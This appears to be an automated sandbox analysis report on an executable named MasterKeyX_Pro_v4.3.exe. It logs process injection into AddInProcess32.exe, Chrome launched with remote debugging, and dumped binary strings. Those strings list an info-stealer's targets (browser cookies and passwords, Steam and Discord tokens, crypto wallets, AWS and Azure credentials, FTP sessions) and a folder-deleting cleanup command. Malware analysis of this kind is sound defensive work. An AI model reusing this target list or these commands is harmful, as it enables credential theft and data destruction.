Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2564 --field-trial-handle=2304,i,13162353612292451237,14053758966757510873,262144 /prefetch:8
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2564 --field-trial-handle=2304,i,13162353612292451237,14053758966757510873,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: MasterKeyX_Pro_v4.3.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: MasterKeyX_Pro_v4.3.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: vdr1.pdb source: MasterKeyX_Pro_v4.3.exe, 00000000.00000002.2627741539.000000000472E000.00000004.00000800.00020000.00000000.sdmp, MasterKeyX_Pro_v4.3.exe, 00000000.00000002.2612742813.0000000002D55000.00000004.00000800.00020000.00000000.sdmp, MasterKeyX_Pro_v4.3.exe, 00000000.00000002.2612742813.0000000002D13000.00000004.00000800.00020000.00000000.sdmp, MasterKeyX_Pro_v4.3.exe, 00000000.00000002.2627741539.00000000046FB000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000006.00000002.2282204244.0000000000140000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: A{"id":1,"method":"Storage.getCookies"}|.tgz.gzSecurityHistoryWork Dir: In memorySOFTWARE\Microsoft\Cryptographyfirefox%08lX%04lX%lu_key.txtSoft\Steam\steam_tokens.txt\Discord\tokens.txtpasswords.txtinformation.txtlocalhostWebSocketClient" & exitGdipGetImageHeightSoftGdipGetImagePixelFormatN0ZWFt\Monero\wallet.keysAzure\.awsstatusWallets_CreateProcessGdipGetImageEncodershttpsSoftware\Martin Prikryl\WinSCP 2\SessionsPlugins/devtoolsprefs.jsLocal Extension SettingsSync Extension SettingsFilescookiesCookies\BraveWallet\Preferenceskey_datas%s\%s\%sPortNumberCurrentBuildNumberGdiplusStartup.zipGdipCreateHBITMAPFromBitmapOpera Crypto.zooUnknownGdiplusShutdown/json_logins.jsoninvalid string positionSoftware\Martin Prikryl\WinSCP 2\ConfigurationDisplayVersionSOFTWARE\Microsoft\Windows NT\CurrentVersionopentokenamcommunity.comTelegramSoftware\Valve\SteamGdipSaveImageToStreamGdipLoadImageFromStream\AppData\Roaming\FileZilla\recentservers.xml.dllSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstallapprove_aprilNetworkblock.arjprofiles.ini.lzhGdipGetImageWidthwallet_pathSteamPathscreenshot.jpgstring too longvector<T> too longProcessorNameStringloginusers.vdflibraryfolders.vdfconfig.vdfDialogConfig.vdfDialogConfigOverlay*.vdfGdipGetImageEncodersSizesteam.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\cmd.exeC:\Windows\system32\rundll32.exeBravetrueformhistory.sqlitecookies.sqliteplaces.sqliteLocal StatefalseAzure\.azureSOFTWARE\monero-project\monero-corechromefile_nameDisplayNameHostNameProductNameUserNameGdipSaveImageToFilemsal.cacheGdipDisposeImagemodeAzure\.IdentityServiceUseMasterPasswordhwidMachineGuidtask_idbuild_idCrash DetectedDisabled%dx%d%d/%d/%d %d:%d:%d.arcvdr1.pdb\Local Storage\leveldb_0.indexeddb.leveldb_formhistory.db_history.db_cookies.db_passwords.db_webdata.db_key4.db\key4.dbfile_dataLogin DataWeb DataoperaOperachrome-extension_[Processes][Software]\storage\default\\.aws\errors\\Telegram Desktop\\Steam\\config\\.azure\ Stable\\.IdentityService\\discord\/c timeout /t 10 & rd /s /q "C:\ProgramData\" & rd /s /q "C:\ProgramData\\..\.ZDISPLAYOpera GXEXCEPTION_INT_OVERFLOWEXCEPTION_FLT_OVERFLOWEXCEPTION_STACK_OVERFLOWEXCEPTION_FLT_UNDERFLOWPOSTEXCEPTION_BREAKPOINT\Local Storage\leveldb\CURRENTEXCEPTION_DATATYPE_MISALIGNMENTEXCEPTION_FLT_INEXACT_RESULTGETEXCEPTION_IN_PAGE_ERRORdQw4w9WgXcQEXCEPTION_SINGLE_STEPGdipCreateBitmapFromHBITMAPEXCEPTION_INT_DIVIDE_BY_ZEROEXCEPTION_FLT_DIVIDE_BY_ZEROEXCEPTION_NONCONTINUABLE_EXCEPTIONUNKNOWN EXCEPTIONEXCEPTION_INVALID_DISPOSITIONEXCEPTION_PRIV_INSTRUCTIONEXCEPTION_ILLEGAL_INSTRUCTIONEXCEPTION_FLT_INVALID_OPERATIONEXCEPTION_ACCESS_VIOLATIONEXCEPTION_FLT_STACK_CHECKEXCEPTION_FLT_DENORMAL_OPERANDEXCEPTION_ARRAY_BOUNDS_EXCEEDED%d MBIndexedDBOCALAPPDATA?<Host><Port><User><Pass encoding="base64">http://localhost:"webSocketDebuggerUrl":6^userContextId=4294967295465 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73ws://localhost:9223.metadata-v2:22.ps15121Windows 11HTTP/1.1HARDWA

Data Obfuscation

barindex
Source: MasterKeyX_Pro_v4.3.exe, Nz4m2.cs .Net Code: NewLateBinding.LateCall(Rx51B, (Type)null, "Invoke", new object[2]{null,new object[0]}, (string[])null, (Type[])null, (bool[])null, true)
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_02AD6631 push ss; retf 0_2_02AD6640
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_02AD6717 push esp; ret 0_2_02AD6718
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_02ADF5E5 push eax; iretd 0_2_02ADF5EA
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_065393BE push es; iretd 0_2_065393C0
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_06538D83 push ebp; retf 0_2_06538D84
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_0654A2F8 push es; retf 0_2_0654A2FC
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_06545A1F push E8000017h; retf 0_2_06545A61
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_0654A9D8 pushfd ; ret 0_2_0654A9E1
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_065C2F31 push es; iretd 0_2_065C2F68
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_065C2FDF push es; retf 0_2_065C304C
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_065C304D push es; retf 0_2_065C3054
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_06B7C406 push cs; iretd 0_2_06B7C409
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_08783144 push ds; iretd 0_2_08783148
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_08781AC7 push 06BAEEA2h; ret 0_2_08781ACC
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_08783511 push ss; ret 0_2_08783514
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_0BCCABAB push edi; ret 0_2_0BCCABB5
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_0BCC131B push ebp; iretd 0_2_0BCC1328
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_0C88D01A push ecx; ret 0_2_0C88D18E
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Code function: 0_2_0C88D03E push ecx; ret 0_2_0C88D18E
